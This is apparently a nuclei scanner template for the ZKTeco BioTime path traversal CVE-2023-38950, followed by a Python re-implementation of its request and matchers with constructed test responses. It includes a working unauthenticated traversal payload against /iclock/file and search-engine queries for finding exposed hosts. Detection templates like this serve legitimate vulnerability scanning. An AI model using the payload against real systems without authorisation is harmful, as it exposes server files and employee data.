id: CVE-2023-38950

info:
  name: ZKTeco BioTime v8.5.5 - Path Traversal
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files by supplying a crafted payload.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server through path traversal in the iclock API url parameter, potentially exposing employee biometric data, attendance records, and system credentials.
  remediation: |
    Update ZKTeco BioTime to a version newer than 8.5.5 that validates file paths in the iclock API and restricts access to authorized files only.
  reference:
    - https://github.com/advisories/GHSA-4m8x-4g54-h49v
    - http://zkteco.com
    - https://claroty.com/team82/disclosure-dashboard/cve-2023-38950
    - https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38950
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-38950
    cwe-id: CWE-22
    epss-score: 0.834
    epss-percentile: 0.99292
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zkteco
    product: biotime
    shodan-query: http.title:"biotime"
    fofa-query: title="biotime"
    google-query: intitle:"biotime"
  tags: cve,cve2023,zkteco,biotime,lfr,kev,vkev,vuln

http:
  - raw:
      - |
        GET /iclock/file?url=/../../../../../../../../../windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/plain")'
          - 'contains_all(base64_decode(body), "; for 16-bit app support" ,"[extensions]")'
        condition: and
# digest: 4a0a0047304502206bfb20823a66a786dea468fae6e9927e104b5a1adfdeb24a6369c9199553e0ad022100a3294966809298665d10c9877a8fcb36a020abbed02eb62020da1f42072e4cf4:922c64590222798bb761d5b6d8e72950
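The request and the three DSL matchers above, re-implemented as a stand-alone Python checker so the decision logic can be read and exercised without running nuclei. This is an added example, not part of the nuclei template, ProjectDiscovery's code, or ZKTeco's product. The function names (build_request_line, decode_body, is_vulnerable), the hostname, and the sample responses are all my own constructions: the win.ini excerpt is typed in here and base64-encoded to match what the template's base64_decode(body) step expects, not captured from a real BioTime host. The one behaviour I chose rather than copied is treating a body that is not valid base64 as a non-match, which is the conservative reading of the matcher.

```python
import base64
import binascii
from typing import Dict, Optional
from urllib.parse import urlencode

# Traversal payload copied from the template: nine ../ segments, then the
# Windows target file whose marker lines the matcher looks for.
TRAVERSAL_PATH = "/../../../../../../../../../windows/win.ini"
WIN_INI_MARKERS = ("; for 16-bit app support", "[extensions]")


def build_request_line(hostname: str, path: str = TRAVERSAL_PATH) -> str:
    """Return the raw HTTP/1.1 request the template sends for the given Host."""
    query = urlencode({"url": path}, safe="/")  # '.' and '/' stay unencoded
    return f"GET /iclock/file?{query} HTTP/1.1\r\nHost: {hostname}\r\n\r\n"


def decode_body(body: bytes) -> Optional[str]:
    """Mirror base64_decode(body). Returns None (my choice) if the body is not
    valid base64, so a raw, un-encoded file listing does NOT count as a hit."""
    try:
        return base64.b64decode(body, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def is_vulnerable(status_code: int, headers: Dict[str, str], body: bytes) -> bool:
    """Evaluate the template's matchers with condition: and.

    1. status_code == 200
    2. contains(header, "text/plain")  -- substring over the raw header block
    3. contains_all(base64_decode(body), <both win.ini markers>)
    """
    if status_code != 200:
        return False
    header_block = "\r\n".join(f"{name}: {value}" for name, value in headers.items())
    if "text/plain" not in header_block:
        return False
    decoded = decode_body(body)
    if decoded is None:
        return False
    return all(marker in decoded for marker in WIN_INI_MARKERS)


# Constructed sample data (not a real capture): a vulnerable host returns the
# file contents base64-encoded with a text/plain content type.
SAMPLE_WIN_INI = (
    "; for 16-bit app support\r\n"
    "[fonts]\r\n"
    "[extensions]\r\n"
    "[mci extensions]\r\n"
    "[files]\r\n"
)
SAMPLE_HEADERS = {"Content-Type": "text/plain", "Server": "nginx"}
SAMPLE_VULNERABLE_BODY = base64.b64encode(SAMPLE_WIN_INI.encode())
# Valid base64, but only one of the two markers: contains_all must fail.
SAMPLE_DECOY_BODY = base64.b64encode(b"[extensions]\r\n")


if __name__ == "__main__":
    print(build_request_line("biotime.example.internal"))  # hypothetical host
    print("base64 win.ini  ->", is_vulnerable(200, SAMPLE_HEADERS, SAMPLE_VULNERABLE_BODY))
    print("raw win.ini     ->", is_vulnerable(200, SAMPLE_HEADERS, SAMPLE_WIN_INI.encode()))
    print("single marker   ->", is_vulnerable(200, SAMPLE_HEADERS, SAMPLE_DECOY_BODY))
```

Note that the matcher requires both markers in the decoded body; a 200 text/plain reply that merely echoes the requested path, or that returns the file un-encoded, is rejected, which is what keeps the template's false-positive rate low against generic 200-for-everything front ends.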